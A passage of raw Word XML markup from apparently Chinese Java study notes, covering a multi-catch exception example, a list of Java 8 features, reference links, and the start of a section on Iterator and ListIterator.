          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="108AC6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="143510" cy="136525"/>
            <wp:effectExtent l="19050" t="0" r="8890" b="0"/>
            <wp:docPr id="64" name="图片 3" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="143510" cy="136525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="5" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="193" w:lineRule="atLeast"/>
        <w:ind w:left="505"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> testSequence() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="5" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="193" w:lineRule="atLeast"/>
        <w:ind w:left="505"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="5" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="193" w:lineRule="atLeast"/>
        <w:ind w:left="505"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        Integer.parseInt(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>"Hello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="5" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="193" w:lineRule="atLeast"/>
        <w:ind w:left="505"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="5" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="193" w:lineRule="atLeast"/>
        <w:ind w:left="505"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (NumberFormatException | RuntimeException e) {  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>'|'</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>分割，多个类型，一个对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="5" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="193" w:lineRule="atLeast"/>
        <w:ind w:left="505"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>         </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="5" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="193" w:lineRule="atLeast"/>
        <w:ind w:left="505"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="5" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="193" w:lineRule="atLeast"/>
        <w:ind w:left="505"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>}  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00DA285D"/>
    <w:p w:rsidR="00AF4FFB" w:rsidRDefault="004D2B05" w:rsidP="00DA285D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF4FFB" w:rsidRDefault="004D2B05" w:rsidP="00DA285D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00AF4FFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口默认实现方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者叫扩展方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D2B05" w:rsidRDefault="004D2B05" w:rsidP="00DA285D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="0056634E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lamda</w:t>
      </w:r>
      <w:r w:rsidR="0056634E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00465B38" w:rsidRDefault="00465B38" w:rsidP="00DA285D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数式接口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50BC7" w:rsidRPr="00B50BC7" w:rsidRDefault="00DA54D7" w:rsidP="00B50BC7">
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidR="00383D9B" w:rsidRPr="00F211C3">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>http://www.jb51.net/article/48304.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00383D9B" w:rsidRDefault="00383D9B" w:rsidP="00383D9B">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00563FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C452C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遍历集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50BC7" w:rsidRPr="00B50BC7" w:rsidRDefault="00C452C2" w:rsidP="00C452C2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.23.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ListIterator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383D9B" w:rsidRPr="00C452C2" w:rsidRDefault="00DA54D7" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidR="00B814D4" w:rsidRPr="00C452C2">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.jb51.net/article/48301.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C9215B" w:rsidRPr="00C452C2" w:rsidRDefault="00C9215B" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://stackoverflow.com/questions/10707352/interview-merging-two-sorted-singly-linked-list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B814D4" w:rsidRDefault="00B814D4" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>功能比较简单，并且只能单向移动：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>iterator()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
